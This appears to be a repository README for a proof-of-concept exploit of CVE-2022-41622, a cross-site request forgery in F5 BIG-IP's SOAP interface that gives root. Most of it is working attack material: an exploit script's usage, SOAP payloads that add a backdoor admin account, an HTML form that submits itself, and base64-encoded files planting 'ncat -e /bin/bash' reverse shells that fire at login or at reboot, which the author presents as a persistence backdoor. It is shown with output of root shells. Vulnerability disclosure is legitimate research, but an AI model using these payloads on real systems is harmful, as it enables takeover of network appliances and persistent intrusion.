Associated Vulnerability
Description
A PoC exploit for CVE-2022-41622 - a CSRF in F5 BIG-IP control plane that leads to remote root
Readme
This is a proof of concept for CVE-2022-41622, which is a CSRF in F5 Big-IP that
leads to remote code execution. Using this is a bit finnicky, but I'll walk you
through my favourite usecases.
# The vulnerability
The core vulnerability is a cross-site request forgery in F5 Big-IP's SOAP
interface, which is accessed via `/iControl/iControlPortal.cgi`, which runs
as `root`. But despite being root, we're restricted by an SELinux policy, which
makes this difficult to exploit. We'll show some bypasses below, though.
The SOAP interface has no CSRF protection, which means an attacker can leverage
an authenticated user's session to perform any SOAP request supported. The full
list of WSDL files is included, and we've created payloads for some of the
important ones.
# Basic usage
The basic usage is:
```
ruby f5-soap-exploit.rb <target> <xml_template> [username:password]
```
The `username:password` is purely for testing - it takes a valid admin account
and sends the SOAP request directly to the server. This isn't an exploit or PoC
at all, it's simply using the endpoint as intended.
If you *don't* provide a `username:password`, it will print a CSRF payload.
To exploit the bug, an authenticated admin will have to visit a site containing
that payload. Their browser will be redirected and the action will happen in
the background.
Note that the actual payloads aren't pretty or hidden in any way - to exploit
this forreal, you'll probably have to put some effort in.
# Scenarios
We'll demonstrate these using an actual account, but remember that you can
exploit any of these using CSRF!
## Add a root user
This is probably the easiest one to exploit. It adds a user account with a
password, and you can use that password to log in via ssh. It's also noisy, of
course!
(The default password in the payload is `Password1`)
```
$ ruby ./f5-soap-exploit.rb 10.0.0.162 ./templates/add_user.xml admin:Password1
NOTE: You've provided a username and password, which means this is going
to authenticate, and therefore isn't an exploit
Don't enter a username:password if you want to generate a CSRF exploit!
Value for USERNAME [rontest]: mybackdoor
Value for FULLNAME [Ron Test]: My Backdoor
Value for CRYPTSHA512HASH [$6$T2mT4PeYSuyg/hSr$y/rN9tol5t1fRxTBqFVtxLzRfUBXt16yNahqYTaVVZa3PITfoAKBnuzqvwBT77qNBV4JjgwdhzqmsMk78bo6d0]:
Sending the following payload directly to 10.0.0.162...
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:user="urn:iControl:Management/UserManagement" xmlns:so
apenc="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Header/>
<soapenv:Body>
<user:create_user_3 soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<users xsi:type="urn:Management.UserManagement.UserInfo3Sequence" soapenc:arrayType="urn:Management.UserManagement.UserInfo3[]" xmlns:urn="urn:iControl">
<item>
<user>
<name>mybackdoor</name>
<full_name>My Backdoor</full_name>
</user>
<password>
<is_encrypted>true</is_encrypted>
<password>$6$T2mT4PeYSuyg/hSr$y/rN9tol5t1fRxTBqFVtxLzRfUBXt16yNahqYTaVVZa3PITfoAKBnuzqvwBT77qNBV4JjgwdhzqmsMk78bo6d0</password>
</password>
<permissions>
<item>
<role>USER_ROLE_ADMINISTRATOR</role>
<partition>[All]</partition>
</item>
</permissions>
<login_shell>/bin/bash</login_shell>
</item>
</users>
</user:create_user_3>
</soapenv:Body>
</soapenv:Envelope>
Response:
<E:Envelope
xmlns:E="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:A="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://www.w3.org/2001/XMLSchema-instance"
xmlns:y="http://www.w3.org/2001/XMLSchema"
xmlns:iControl="urn:iControl"
E:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<E:Body>
<m:create_user_3Response
xmlns:m="urn:iControl:Management/UserManagement"></m:create_user_3Response>
</E:Body>
</E:Envelope>
$ ssh mybackdoor@10.0.0.162
(mybackdoor@10.0.0.162) Password:
(mybackdoor@10.0.0.162) You are required to change your password immediately (root enforced)
[...]
[mybackdoor@localhost:NO LICENSE:Standalone] ~ # whoami
root
```
## Remote shell @ Login
We found a symlink in `/etc/profile.d` that's not covered by SELinux:
```
# ls -l /etc/profile.d/timeout.sh
lrwxrwxrwx. 1 root root 31 Jul 15 02:48 /etc/profile.d/timeout.sh -> ../../var/run/config/timeout.sh
```
`timeout.sh` can be replaced, and the next time a user logs in, any code in it
will run. Note that overwriting `timeout.sh` may cause problems, I have no idea
what it's supposed to do (it gets restored at reboot, though).
We will replace timeout.sh with the following - basically, restore the original
timeout.sh then pop a shell (you can also find it in the [examples/](/examples/)
folder):
```
# Restore the original file
echo 'IwojIFRISVMgSVMgQU4gQVVUTy1HRU5FUkFURUQgRklMRSAtIERPIE5PVCBFRElUISEhCiMKIyBVc2UgdGhlIHRtc2ggc2hlbGwgdXRpbGl0eSB0byBtYWtlIGNoYW5nZXMgdG8gdGhlIHN5c3RlbSBjb25maWd1cmF0aW9uLgojIEZvciBtb3JlIGluZm9ybWF0aW9uLCBzZWUgdG1zaCAtYSBoZWxwIHN5cyBzc2hkLgpQU09VVD1gL2Jpbi9wcyAtLW5vLWhlYWRlcnMgLW8gdHR5IC0kJGAKaWYgWyAiJHtQU09VVDowOjN9IiA9PSAidHR5IiBdOyB0aGVuCiAgICBleHBvcnQgVE1PVVQ9MAplbHNlCiAgICBleHBvcnQgVE1PVVQ9MApmaQoK' | base64 -d > /etc/profile.d/timeout.sh
# Pop a shell
ncat -e /bin/bash 10.0.0.179 4444
```
Here's the request / response:
```
$ base64 -w0 < examples/timeout.sh
IyBSZXN0b3JlIHRoZSBvcmlnaW5hbCBmaWxlCmVjaG8gJ0l3b2pJRlJJU1ZNZ1NWTWdRVTRnUVZWVVR5MUhSVTVGVWtGVVJVUWdSa2xNUlNBdElFUlBJRTVQVkNCRlJFbFVJU0VoQ2lNS0l5QlZjMlVnZEdobElIUnRjMmdnYzJobGJHd2dkWFJwYkdsMGVTQjBieUJ0WVd0bElHTm9ZVzVuWlhNZ2RHOGdkR2hsSUhONWMzUmxiU0JqYjI1bWFXZDFjbUYwYVc5dUxnb2pJRVp2Y2lCdGIzSmxJR2x1Wm05eWJXRjBhVzl1TENCelpXVWdkRzF6YUNBdFlTQm9aV3h3SUhONWN5QnpjMmhrTGdwUVUwOVZWRDFnTDJKcGJpOXdjeUF0TFc1dkxXaGxZV1JsY25NZ0xXOGdkSFI1SUMwa0pHQUthV1lnV3lBaUpIdFFVMDlWVkRvd09qTjlJaUE5UFNBaWRIUjVJaUJkT3lCMGFHVnVDaUFnSUNCbGVIQnZjblFnVkUxUFZWUTlNQXBsYkhObENpQWdJQ0JsZUhCdmNuUWdWRTFQVlZROU1BcG1hUW9LJyB8IGJhc2U2NCAtZCA+IC92YXIvcnVuL2NvbmZpZy90aW1lb3V0LnNoCgojIFBvcCBhIHNoZWxsCm5jYXQgLWUgL2Jpbi9iYXNoIDEwLjAuMC4xNzkgNDQ0NAo=
$ ruby ./f5-soap-exploit.rb 10.0.0.162 ./templates/upload_file.xml admin:Password1
NOTE: You've provided a username and password, which means this is going
to authenticate, and therefore isn't an exploit
Don't enter a username:password if you want to generate a CSRF exploit!
Value for FILENAME [/tmp/csrfdemo.txt]: /var/run/config/timeout.sh
Value for BASE64FILEDATA [SGVsbG8gd29ybGQh]: IyBSZXN0b3JlIHRoZSBvcmlnaW5hbCBmaWxlCmVjaG8gJ0l3b2pJRlJJU1ZNZ1NWTWdRVTRnUVZWVVR5MUhSVTVGVWtGVVJVUWdSa2xNUlNBdElFUlBJRTVQVkNCRlJFbFVJU0VoQ2lNS0l5QlZjMlVnZEdobElIUnRjMmdnYzJobGJHd2dkWFJwYkdsMGVTQjBieUJ0WVd0bElHTm9ZVzVuWlhNZ2RHOGdkR2hsSUhONWMzUmxiU0JqYjI1bWFXZDFjbUYwYVc5dUxnb2pJRVp2Y2lCdGIzSmxJR2x1Wm05eWJXRjBhVzl1TENCelpXVWdkRzF6YUNBdFlTQm9aV3h3SUhONWN5QnpjMmhrTGdwUVUwOVZWRDFnTDJKcGJpOXdjeUF0TFc1dkxXaGxZV1JsY25NZ0xXOGdkSFI1SUMwa0pHQUthV1lnV3lBaUpIdFFVMDlWVkRvd09qTjlJaUE5UFNBaWRIUjVJaUJkT3lCMGFHVnVDaUFnSUNCbGVIQnZjblFnVkUxUFZWUTlNQXBsYkhObENpQWdJQ0JsZUhCdmNuUWdWRTFQVlZROU1BcG1hUW9LJyB8IGJhc2U2NCAtZCA+IC92YXIvcnVuL2NvbmZpZy90aW1lb3V0LnNoCgojIFBvcCBhIHNoZWxsCm5jYXQgLWUgL2Jpbi9iYXNoIDEwLjAuMC4xNzkgNDQ0NAo=
Sending the following payload directly to 10.0.0.162...
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:con="urn:iControl:System/ConfigSync">
<soapenv:Header/>
<soapenv:Body>
<con:upload_file soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<file_name xsi:type="xsd:string">/var/run/config/timeout.sh</file_name>
<file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl">
<!--type: Common.OctetSequence-->
<file_data xsi:type="urn:Common.OctetSequence">IyBSZXN0b3JlIHRoZSBvcmlnaW5hbCBmaWxlCmVjaG8gJ0l3b2pJRlJJU1ZNZ1NWTWdRVTRnUVZWVVR5MUhSVTVGVWtGVVJVUWdSa2xNUlNBdElFUlBJRTVQVkNCRlJFbFVJU0VoQ2lNS0l5QlZjMlVnZEdobElIUnRjMmdnYzJobGJHd2dkWFJwYkdsMGVTQjBieUJ0WVd0bElHTm9ZVzVuWlhNZ2RHOGdkR2hsSUhONWMzUmxiU0JqYjI1bWFXZDFjbUYwYVc5dUxnb2pJRVp2Y2lCdGIzSmxJR2x1Wm05eWJXRjBhVzl1TENCelpXVWdkRzF6YUNBdFlTQm9aV3h3SUhONWN5QnpjMmhrTGdwUVUwOVZWRDFnTDJKcGJpOXdjeUF0TFc1dkxXaGxZV1JsY25NZ0xXOGdkSFI1SUMwa0pHQUthV1lnV3lBaUpIdFFVMDlWVkRvd09qTjlJaUE5UFNBaWRIUjVJaUJkT3lCMGFHVnVDaUFnSUNCbGVIQnZjblFnVkUxUFZWUTlNQXBsYkhObENpQWdJQ0JsZUhCdmNuUWdWRTFQVlZROU1BcG1hUW9LJyB8IGJhc2U2NCAtZCA+IC92YXIvcnVuL2NvbmZpZy90aW1lb3V0LnNoCgojIFBvcCBhIHNoZWxsCm5jYXQgLWUgL2Jpbi9iYXNoIDEwLjAuMC4xNzkgNDQ0NAo=</file_data>
<chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type>
</file_context>
</con:upload_file>
</soapenv:Body>
</soapenv:Envelope>
Response:
<E:Envelope
xmlns:E="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:A="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://www.w3.org/2001/XMLSchema-instance"
xmlns:y="http://www.w3.org/2001/XMLSchema"
xmlns:iControl="urn:iControl"
E:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<E:Body>
<m:upload_fileResponse
xmlns:m="urn:iControl:System/ConfigSync"></m:upload_fileResponse>
</E:Body>
</E:Envelope>
```
Then we listen, wait for somebody to log in, then get a shell:
```
$ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
[..... wait .....]
Ncat: Connection from 10.0.0.162.
Ncat: Connection from 10.0.0.162:38588.
whoami
root
```
## Remote shell @ Reboot
We found a shell-injection vulnerability in a tool called `f5_update_checker`
that runs as root (and with no SELinux restrictions) at reboot. If we create a
file, `/shared/f5_update_action` with a properly-formatted update file, and
a shell injection payload on line 2, it'll execute 2 minutes after the server's
next boot then get deleted.
This would make a great backdoor for persistence. :)
Here's an example (it's also in the [examples/](/examples/) folder):
```
AAA
https://localhost/success`ncat -e /bin/bash 10.0.0.179 4444`
https://localhost/error
0
0
0
0
```
Encode as base64, and upload it using the `upload_file.xml` template:
```
$ base64 -w0 < examples/f5_update_action
QUFBCmh0dHBzOi8vbG9jYWxob3N0L3N1Y2Nlc3NgbmNhdCAtZSAvYmluL2Jhc2ggMTAuMC4wLjE3OSA0NDQ0YApodHRwczovL2xvY2FsaG9zdC9lcnJvcgowCjAKMAowCg==
$ ruby ./f5-soap-exploit.rb 10.0.0.162 ./templates/upload_file.xml admin:Password1
NOTE: You've provided a username and password, which means this is going
to authenticate, and therefore isn't an exploit
Don't enter a username:password if you want to generate a CSRF exploit!
Value for FILENAME [/tmp/csrfdemo.txt]: /shared/f5_update_action
Value for BASE64FILEDATA [SGVsbG8gd29ybGQh]: QUFBCmh0dHBzOi8vbG9jYWxob3N0L3N1Y2Nlc3NgbmNhdCAtZSAvYmluL2Jhc2ggMTAuMC4wLjE3OSA0NDQ0YApodHRwczovL2xvY2FsaG9zdC9lcnJvcgowCjAKMAowCg==
Sending the following payload directly to 10.0.0.162...
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:con="urn:iControl:System/ConfigSync">
<soapenv:Header/>
<soapenv:Body>
<con:upload_file soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<file_name xsi:type="xsd:string">/shared/f5_update_action</file_name>
<file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl">
<!--type: Common.OctetSequence-->
<file_data xsi:type="urn:Common.OctetSequence">QUFBCmh0dHBzOi8vbG9jYWxob3N0L3N1Y2Nlc3NgbmNhdCAtZSAvYmluL2Jhc2ggMTAuMC4wLjE3OSA0NDQ0YApodHRwczovL2xvY2FsaG9zdC9lcnJvcgowCjAKMAowCg==</file_data>
<chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type>
</file_context>
</con:upload_file>
</soapenv:Body>
</soapenv:Envelope>
Response:
<E:Envelope
xmlns:E="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:A="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://www.w3.org/2001/XMLSchema-instance"
xmlns:y="http://www.w3.org/2001/XMLSchema"
xmlns:iControl="urn:iControl"
E:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<E:Body>
<m:upload_fileResponse
xmlns:m="urn:iControl:System/ConfigSync"></m:upload_fileResponse>
</E:Body>
</E:Envelope>
```
Create a listener, then wait for a reboot:
```
ron@fedora ~ $ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
[...... wait ......]
Ncat: Connection from 10.0.0.162.
Ncat: Connection from 10.0.0.162:55634.
whoami
root
```
You can tail `/var/log/f5_update_checker.out` after rebooting to make sure it
worked (obviously this only works if you already have access to the host):
```
# cat /var/log/f5_update_checker.out
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: EM callback utility started
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: Searching for EM callback file "/shared/f5_update_action"
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: EM callback file found -- parsing
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: EM callback file action: "AAA"
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: EM callback file success URL: "https://localhost/success`ncat -e /bin/bash 10.0.0.179 4444`"
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: EM callback file failure URL: "https://localhost/error"
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess flag: "8"
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess slot: "0"
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: EM callback file rebootOnFailure flag: "0"
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: EM callback file rebootOnFailure slot: "0"
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: Executing EM action: AAA
[Wed Oct 19 10:47:32 2022] f5em_callback [INFO]: Sleeping for 2 minutes before first attempt.
```
## Add User w/ CSRF
The previous examples show how to do run SOAP endpoints with an account, but
obviously that's not really an exploit. Let's take a look at what a CSRF payload
looks like!
We'll use the same example of adding a user as above, but without an account:
```
$ ruby ./f5-soap-exploit.rb 10.0.0.162 ./templates/add_user.xml > examples/csrf-adduser-payload.html
Value for USERNAME [rontest]: csrfdemo2
Value for FULLNAME [Ron Test]: CSRF Demo
Value for CRYPTSHA512HASH [$6$T2mT4PeYSuyg/hSr$y/rN9tol5t1fRxTBqFVtxLzRfUBXt16yNahqYTaVVZa3PITfoAKBnuzqvwBT77qNBV4JjgwdhzqmsMk78bo6d0]:
$ cat examples/csrf-adduser-payload.html
<form id="form" method="post" action="https://10.0.0.162/iControl/iControlPortal.cgi" enctype="text/plain">
<textarea id="payload" name="<!--">--><soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:user="urn:iControl:Management/UserManagement" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Header/>
<soapenv:Body>
<user:create_user_3 soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<users xsi:type="urn:Management.UserManagement.UserInfo3Sequence" soapenc:arrayType="urn:Management.UserManagement.UserInfo3[]" xmlns:urn="urn:iControl">
<item>
<user>
<name>csrfdemo2</name>
<full_name>CSRF Demo</full_name>
</user>
<password>
<is_encrypted>true</is_encrypted>
<password>$6$T2mT4PeYSuyg/hSr$y/rN9tol5t1fRxTBqFVtxLzRfUBXt16yNahqYTaVVZa3PITfoAKBnuzqvwBT77qNBV4JjgwdhzqmsMk78bo6d0</password>
</password>
<permissions>
<item>
<role>USER_ROLE_ADMINISTRATOR</role>
<partition>[All]</partition>
</item>
</permissions>
<login_shell>/bin/bash</login_shell>
</item>
</users>
</user:create_user_3>
</soapenv:Body>
</soapenv:Envelope>
</textarea>
<input type=submit>
</form>
<script>
setTimeout(function() {
document.getElementById("form").submit();
}, 1000);
</script>
```
Serve that HTML file somewhere, and send a link to an administrator. When the
administrator visits that link, their browser will redirect and access the
SOAP API using a typical CSRF payload.
```
$ python -m http.server -d examples/
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
[..... waiting .....]
127.0.0.1 - - [19/Oct/2022 11:07:57] "GET /csrf-adduser-payload.html HTTP/1.1" 200 -
127.0.0.1 - - [19/Oct/2022 11:07:58] code 404, message File not found
127.0.0.1 - - [19/Oct/2022 11:07:58] "GET /favicon.ico HTTP/1.1" 404 -
^C
$ ssh csrfdemo2@10.0.0.162
(csrfdemo2@10.0.0.162) Password:
(csrfdemo2@10.0.0.162) You are required to change your password immediately (root enforced)
Changing password for csrfdemo2.
(current) BIG-IP password:
(csrfdemo2@10.0.0.162) New BIG-IP password:
(csrfdemo2@10.0.0.162) Retype new BIG-IP password:
Last login: Wed Oct 19 11:00:43 2022 from 10.0.0.179
[csrfdemo2@localhost:NO LICENSE:Standalone] ~ # whoami
root
```
This obviously doesn't try to hide in any way - you can improve the CSRF payload
a great deal!
File Snapshot
[4.0K] /data/pocs/6c1a91c65ada18e970294eba0337c9a35dbc8f99
├── [4.0K] csrf
│ ├── [1.8K] add-login-backdoor.html
│ ├── [1.3K] add-reboot-backdoor.html
│ └── [1.4K] add-user.html
├── [4.0K] examples
│ ├── [1.6K] csrf-adduser-payload.html
│ ├── [ 97] f5_update_action
│ └── [ 548] timeout.sh
├── [2.3K] f5-soap-exploit.rb
├── [ 17K] README.md
├── [4.0K] templates
│ ├── [1.0K] add_user.xml
│ ├── [ 660] getadmin.xml
│ ├── [ 387] ip_get_list.xml
│ ├── [ 550] move_file.xml
│ └── [ 838] upload_file.xml
└── [ 20K] wsdl
├── [ 53K] ASM.LoggingProfile.wsdl
├── [6.9K] ASM.ObjectParams.wsdl
├── [ 12K] ASM.PolicyGroup.wsdl
├── [132K] ASM.Policy.wsdl
├── [7.6K] ASM.PSMProfile.wsdl
├── [ 33K] ASM.SystemConfiguration.wsdl
├── [ 12K] ASM.WebApplicationGroup.wsdl
├── [ 44K] ASM.WebApplication.wsdl
├── [ 17K] Classification.Application.wsdl
├── [ 17K] Classification.Category.wsdl
├── [ 20K] Classification.SignatureDefinition.wsdl
├── [ 16K] Classification.SignatureUpdateSchedule.wsdl
├── [8.3K] Classification.SignatureVersion.wsdl
├── [ 38K] GlobalLB.Application.wsdl
├── [425K] GlobalLB.DataCenter.wsdl
├── [ 54K] GlobalLB.DNSSECKey.wsdl
├── [413K] GlobalLB.DNSSECZone.wsdl
├── [186K] GlobalLB.Globals.wsdl
├── [432K] GlobalLB.Link.wsdl
├── [ 77K] GlobalLB.Monitor.wsdl
├── [419K] GlobalLB.PoolMember.wsdl
├── [577K] GlobalLB.PoolV2.wsdl
├── [554K] GlobalLB.Pool.wsdl
├── [417K] GlobalLB.ProberPool.wsdl
├── [ 17K] GlobalLB.Region.wsdl
├── [403K] GlobalLB.Rule.wsdl
├── [489K] GlobalLB.Server.wsdl
├── [ 17K] GlobalLB.Topology.wsdl
├── [421K] GlobalLB.VirtualServerV2.wsdl
├── [416K] GlobalLB.VirtualServer.wsdl
├── [473K] GlobalLB.WideIPV2.wsdl
├── [480K] GlobalLB.WideIP.wsdl
├── [ 24K] iCall.PeriodicHandler.wsdl
├── [ 36K] iCall.PerpetualHandler.wsdl
├── [ 12K] iCall.Script.wsdl
├── [ 35K] iCall.TriggeredHandler.wsdl
├── [ 55K] LocalLB.ALGLogProfile.wsdl
├── [ 30K] LocalLB.CipherGroup.wsdl
├── [ 18K] LocalLB.CipherRule.wsdl
├── [ 71K] LocalLB.Class.wsdl
├── [ 45K] LocalLB.ContentPolicyStrategy.wsdl
├── [267K] LocalLB.ContentPolicy.wsdl
├── [ 32K] LocalLB.DataGroupFile.wsdl
├── [485K] LocalLB.DNSCache.wsdl
├── [423K] LocalLB.DNSExpress.wsdl
├── [ 14K] LocalLB.DNSGlobals.wsdl
├── [394K] LocalLB.DNSServer.wsdl
├── [ 12K] LocalLB.DNSTSIGKey.wsdl
├── [414K] LocalLB.DNSZone.wsdl
├── [470K] LocalLB.FlowEvictionPolicy.wsdl
├── [ 22K] LocalLB.iFileFile.wsdl
├── [8.8K] LocalLB.iFile.wsdl
├── [ 46K] LocalLB.LSNLogProfile.wsdl
├── [461K] LocalLB.LSNPool.wsdl
├── [ 33K] LocalLB.MessageRoutingPeer.wsdl
├── [ 29K] LocalLB.MessageRoutingSIPRoute.wsdl
├── [ 47K] LocalLB.MessageRoutingTransportConfig.wsdl
├── [ 92K] LocalLB.Monitor.wsdl
├── [405K] LocalLB.NATV2.wsdl
├── [395K] LocalLB.NAT.wsdl
├── [448K] LocalLB.NodeAddressV2.wsdl
├── [423K] LocalLB.NodeAddress.wsdl
├── [ 56K] LocalLB.OCSPStaplingParameters.wsdl
├── [427K] LocalLB.PoolMember.wsdl
├── [608K] LocalLB.Pool.wsdl
├── [223K] LocalLB.ProfileAnalytics.wsdl
├── [416K] LocalLB.ProfileAuth.wsdl
├── [ 13K] LocalLB.ProfileClassification.wsdl
├── [402K] LocalLB.ProfileClientLDAP.wsdl
├── [656K] LocalLB.ProfileClientSSL.wsdl
├── [429K] LocalLB.ProfileDiameterEndpoint.wsdl
├── [429K] LocalLB.ProfileDiameterRouter.wsdl
├── [558K] LocalLB.ProfileDiameterSession.wsdl
├── [458K] LocalLB.ProfileDiameter.wsdl
├── [ 29K] LocalLB.ProfileDNSLogging.wsdl
├── [458K] LocalLB.ProfileDNS.wsdl
├── [453K] LocalLB.ProfileFastHttp.wsdl
├── [491K] LocalLB.ProfileFastL4.wsdl
├── [423K] LocalLB.ProfileFIX.wsdl
├── [421K] LocalLB.ProfileFTP.wsdl
├── [432K] LocalLB.ProfileHttpClass.wsdl
├── [468K] LocalLB.ProfileHttpCompression.wsdl
├── [650K] LocalLB.ProfileHttp.wsdl
├── [414K] LocalLB.ProfileICAP.wsdl
├── [408K] LocalLB.ProfileIIOP.wsdl
├── [414K] LocalLB.ProfileIPsecALG.wsdl
├── [419K] LocalLB.ProfileOneConnect.wsdl
├── [ 52K] LocalLB.ProfilePCP.wsdl
├── [114K] LocalLB.ProfilePersistence.wsdl
├── [405K] LocalLB.ProfilePPTP.wsdl
├── [406K] LocalLB.ProfileRADIUS.wsdl
├── [421K] LocalLB.ProfileRequestAdapt.wsdl
├── [ 73K] LocalLB.ProfileRequestLogging.wsdl
├── [422K] LocalLB.ProfileResponseAdapt.wsdl
├── [440K] LocalLB.ProfileRTSP.wsdl
├── [478K] LocalLB.ProfileSCTP.wsdl
├── [402K] LocalLB.ProfileServerLDAP.wsdl
├── [570K] LocalLB.ProfileServerSSL.wsdl
├── [461K] LocalLB.ProfileSIPRouter.wsdl
├── [474K] LocalLB.ProfileSIPSession.wsdl
├── [453K] LocalLB.ProfileSIP.wsdl
├── [401K] LocalLB.ProfileSMTPS.wsdl
├── [435K] LocalLB.ProfileSPDY.wsdl
├── [ 33K] LocalLB.ProfileSPM.wsdl
├── [402K] LocalLB.ProfileStream.wsdl
├── [ 51K] LocalLB.ProfileTCPAnalytics.wsdl
├── [599K] LocalLB.ProfileTCP.wsdl
├── [407K] LocalLB.ProfileTFTP.wsdl
├── [409K] LocalLB.ProfileTrafficAcceleration.wsdl
├── [417K] LocalLB.ProfileUDP.wsdl
├── [ 33K] LocalLB.ProfileUserStatistic.wsdl
├── [468K] LocalLB.ProfileWebAcceleration.wsdl
├── [418K] LocalLB.ProfileXML.wsdl
├── [ 15K] LocalLB.RAMCacheInformation.wsdl
├── [512K] LocalLB.RateClass.wsdl
├── [416K] LocalLB.Rule.wsdl
├── [383K] LocalLB.SNATPoolMember.wsdl
├── [407K] LocalLB.SNATPool.wsdl
├── [411K] LocalLB.SNATTranslationAddressV2.wsdl
├── [405K] LocalLB.SNATTranslationAddress.wsdl
├── [424K] LocalLB.SNAT.wsdl
├── [453K] LocalLB.VirtualAddressV2.wsdl
├── [407K] LocalLB.VirtualAddress.wsdl
├── [828K] LocalLB.VirtualServer.wsdl
├── [ 12K] Log.DestinationArcSight.wsdl
├── [ 26K] Log.DestinationIPFIX.wsdl
├── [ 16K] Log.DestinationLocalSyslog.wsdl
├── [ 19K] Log.DestinationManagementPort.wsdl
├── [ 26K] Log.DestinationRemoteHighSpeedLog.wsdl
├── [ 30K] Log.DestinationRemoteSyslog.wsdl
├── [ 12K] Log.DestinationSplunk.wsdl
├── [ 57K] Log.Filter.wsdl
├── [ 30K] Log.IPFIXInformationElement.wsdl
├── [ 13K] Log.Publisher.wsdl
├── [ 20K] LTConfig.Class.wsdl
├── [ 23K] LTConfig.Field.wsdl
├── [ 26K] Management.ApplicationPresentationScript.wsdl
├── [ 67K] Management.ApplicationService.wsdl
├── [ 49K] Management.ApplicationTemplate.wsdl
├── [ 59K] Management.CCLDAPConfiguration.wsdl
├── [441K] Management.CertificateValidatorOCSP.wsdl
├── [ 88K] Management.CertLDAPConfiguration.wsdl
├── [ 25K] Management.ChangeControl.wsdl
├── [ 23K] Management.CLIScript.wsdl
├── [ 25K] Management.CRLDPConfiguration.wsdl
├── [ 19K] Management.CRLDPServer.wsdl
├── [ 11K] Management.DBVariable.wsdl
├── [ 42K] Management.DeviceGroup.wsdl
├── [ 58K] Management.Device.wsdl
├── [ 15K] Management.EM.wsdl
├── [ 39K] Management.EventNotification.wsdl
├── [ 56K] Management.EventSubscription.wsdl
├── [ 15K] Management.FeatureModule.wsdl
├── [ 20K] Management.Folder.wsdl
├── [5.5K] Management.Globals.wsdl
├── [161K] Management.KeyCertificate.wsdl
├── [ 92K] Management.LDAPConfiguration.wsdl
├── [ 35K] Management.LicenseAdministration.wsdl
├── [ 24K] Management.Named.wsdl
├── [ 15K] Management.OCSPConfiguration.wsdl
├── [ 87K] Management.OCSPResponder.wsdl
├── [ 19K] Management.Partition.wsdl
├── [ 27K] Management.Provision.wsdl
├── [ 33K] Management.RADIUSConfiguration.wsdl
├── [ 19K] Management.RADIUSServer.wsdl
├── [ 76K] Management.ResourceRecord.wsdl
├── [ 26K] Management.SFlowDataSource.wsdl
├── [ 27K] Management.SFlowGlobals.wsdl
├── [ 23K] Management.SFlowReceiver.wsdl
├── [ 29K] Management.SMTPConfiguration.wsdl
├── [165K] Management.SNMPConfiguration.wsdl
├── [ 33K] Management.TACACSConfiguration.wsdl
├── [ 12K] Management.TMOSModule.wsdl
├── [ 41K] Management.TrafficGroup.wsdl
├── [ 32K] Management.Trust.wsdl
├── [ 63K] Management.UserManagement.wsdl
├── [ 11K] Management.View.wsdl
├── [6.4K] Management.ZoneRunner.wsdl
├── [ 20K] Management.Zone.wsdl
├── [ 36K] Networking.AdminIP.wsdl
├── [ 25K] Networking.ARP.wsdl
├── [ 57K] Networking.BWControllerPolicy.wsdl
├── [ 23K] Networking.BWPriorityGroup.wsdl
├── [ 45K] Networking.DNSResolver.wsdl
├── [472K] Networking.Interfaces.wsdl
├── [ 12K] Networking.IPsecIkeDaemon.wsdl
├── [114K] Networking.IPsecIkePeer.wsdl
├── [ 46K] Networking.IPsecManualSecurityAssociation.wsdl
├── [ 47K] Networking.IPsecPolicy.wsdl
├── [ 38K] Networking.IPsecTrafficSelector.wsdl
├── [ 23K] Networking.iSessionAdvertisedRouteV2.wsdl
├── [ 18K] Networking.iSessionAdvertisedRoute.wsdl
├── [ 16K] Networking.iSessionDatastor.wsdl
├── [ 15K] Networking.iSessionDeduplication.wsdl
